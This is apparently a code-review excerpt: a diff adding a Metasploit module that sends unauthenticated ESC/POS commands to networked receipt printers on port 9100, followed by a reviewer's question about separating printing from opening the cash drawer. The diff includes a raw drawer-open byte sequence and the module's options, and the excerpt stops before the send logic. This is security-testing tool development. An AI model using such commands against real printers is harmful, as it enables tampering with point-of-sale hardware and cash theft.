modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb

```diff
@@ -0,0 +1,91 @@
+# encoding: utf-8
+#
+# Escpos TCP Command Injector for networked Epson-compatible printers
+#
+# This module exploits an unauthenticated ESC/POS command vulnerability in networked receipt printers.
+#
+# Example usage:
+#   use auxiliary/scanner/printer/escpos_tcp_command_injector
+#   set RHOST 192.168.1.100
+#   set MESSAGE "Test"
+#   run
+#
+# WARNING: Only use this module on printers you are authorized to test.
+#
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'ESC/POS Printer Command Injector',
+      'Description' => %q{
+        This module demonstrates an unauthenticated ESC/POS command vulnerability in networked Epson-compatible printers (CVE submitted). 
+        By default, it prints "PWNED" (or a custom MESSAGE).
+        You can also optionally trigger the cash drawer.
+      },
+      'Author'      => ['FutileSkills'],
+      'License'     => MSF_LICENSE,
+      'References'  => [
+        ['URL', 'https://github.com/futileskills/Security-Advisory']
+      ]
+    ))
+
+    register_options(
+      [
+        Opt::RHOST(),                                      # Target IP
+        Opt::RPORT(9100),                                  # Default printer port
+        OptString.new('MESSAGE', [true, 'Message to print', 'PWNED']),
+        OptBool.new('RUN_EXPLOIT', [true, 'Whether to actually send commands to the printer', true]),
+        OptBool.new('TRIGGER_DRAWER', [false, 'Whether to trigger the attached cash drawer', false])
+      ]
+    )
+  end
+
+  # ESC/POS command to trigger the cash drawer
+  DRAWER_COMMAND = "\x1b\x70\x00\x19\x32"
+
+  def run
+    rhost_ip = rhost
+    message = datastore['MESSAGE']
+    run_exploit = datastore['RUN_EXPLOIT']
+    trigger_drawer = datastore['TRIGGER_DRAWER']
```

Comment:
Is sending the print message required prior to opening the drawer?

If printing a message and opening the drawer are two different operations, these could be implemented as two different module `actions`.